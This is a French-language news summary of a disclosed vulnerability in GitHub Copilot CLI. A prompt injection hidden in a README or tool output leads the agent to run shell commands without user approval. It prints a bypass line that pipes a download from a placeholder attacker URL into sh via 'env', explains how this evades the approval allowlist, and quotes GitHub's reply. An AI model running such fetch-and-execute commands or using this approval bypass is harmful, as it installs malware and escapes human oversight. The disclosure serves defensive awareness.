La vulnérabilité de GitHub Copilot CLI permet l'exécution de logiciels malveillants via l'injection de prompts.
Aperçu de la vulnérabilité
GitHub Copilot CLI contient des vulnérabilités qui exposent les utilisateurs à l'exécution arbitraire de commandes shell via une injection indirecte de prompt sans approbation de l'utilisateur. Des logiciels malveillants peuvent être téléchargés depuis des serveurs externes et exécutés sans aucune interaction de l'utilisateur au-delà de la requête initiale au Copilot CLI.
Fonctionnement de l'attaque
La chaîne d'attaque implique :
- L'utilisateur interroge GitHub Copilot CLI en explorant un référentiel open source
- Copilot rencontre une injection de prompt stockée dans un fichier README du référentiel cloné (ou d'autres vecteurs comme les résultats de recherche web, les résultats d'appels d'outils MCP, la sortie de commandes terminal)
- La commande malveillante contourne les systèmes d'approbation avec intervention humaine
Contournement des mécanismes de protection
GitHub Copilot utilise un système d'approbation avec intervention humaine qui nécessite le consentement de l'utilisateur avant l'exécution de commandes potentiellement dangereuses. Ce système est déclenché sauf si :
- L'utilisateur a explicitement configuré la commande pour s'exécuter automatiquement
- La commande fait partie d'une liste 'en lecture seule' codée en dur trouvée dans le code source
Les vérifications d'accès aux URL externes nécessitent l'approbation de l'utilisateur pour des commandes comme curl, wget ou l'outil de récupération web intégré de Copilot. Cependant, les attaquants peuvent contourner ces protections en utilisant :
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shLa commande env figure sur la liste en lecture seule codée en dur, elle s'exécute donc automatiquement sans approbation. Puisque curl et sh sont passés comme arguments à env, ils sont incorrectement analysés et non identifiés par le validateur comme des sous-commandes. Cela contourne les vérifications de permission d'URL qui dépendent de la détection de commandes comme curl.
Réponse de GitHub
GitHub a répondu : "Nous avons examiné votre rapport et validé vos conclusions. Après avoir évalué en interne cette découverte, nous avons déterminé qu'il s'agit d'un problème connu qui ne présente pas de risque de sécurité significatif. Nous pourrions rendre cette fonctionnalité plus stricte à l'avenir, mais nous n'avons rien à annoncer pour le moment."
Portée et limitations
Les vulnérabilités d'analyse de commandes décrites sont spécifiques à macOS. Cependant, GitHub Copilot présente des vulnérabilités supplémentaires incluant à la fois des risques indépendants du système d'exploitation et des risques spécifiques à Windows. D'autres vulnérabilités d'analyse de commandes permettent la lecture et l'écriture arbitraires de fichiers.
📖 Lire la source complète : HN LLM Tools
👀 See Also
L'outil Cloak remplace les mots de passe des chats par des liens autodestructeurs pour les agents OpenClaw.
Cloak est un outil open source qui remplace les mots de passe partagés dans les discussions avec les agents OpenClaw par des liens autodestructeurs. Chaque lien ne peut être ouvert qu'une seule fois, puis le mot de passe disparaît, empêchant ainsi l'accumulation de mots de passe dans les historiques de discussion.
Sandboxing OpenClaw : Renforcer la sécurité dans le codage de l'IA
Découvrez les dernières discussions de la communauté OpenClaw sur le sandboxing, une technique cruciale pour sécuriser les agents de codage IA. Explorez pourquoi les utilisateurs estiment qu'elle est essentielle pour protéger les innovations en IA.
Skill Analyzer désormais disponible sur ClawHub avec une installation en une commande
L'analyseur de sécurité OpenClaw Skill Analyzer est désormais disponible sur ClawHub avec une installation en une seule commande. L'outil analyse les dossiers de compétences à la recherche de modèles malveillants comme l'injection de prompt et le vol d'identifiants, et inclut le support de bac à sable Docker pour une exécution sécurisée.
Axios 1.14.1 compromis par un logiciel malveillant, cible les flux de travail de développement assisté par IA
La version 1.14.1 d'Axios a été compromise dans une attaque de chaîne d'approvisionnement qui intègre silencieusement [email protected], un dropper de RAT (cheval de Troie d'accès à distance) obfusqué. Les développeurs utilisant des assistants de codage IA comme Claude doivent immédiatement vérifier leurs fichiers de verrouillage et leurs machines pour détecter une infection.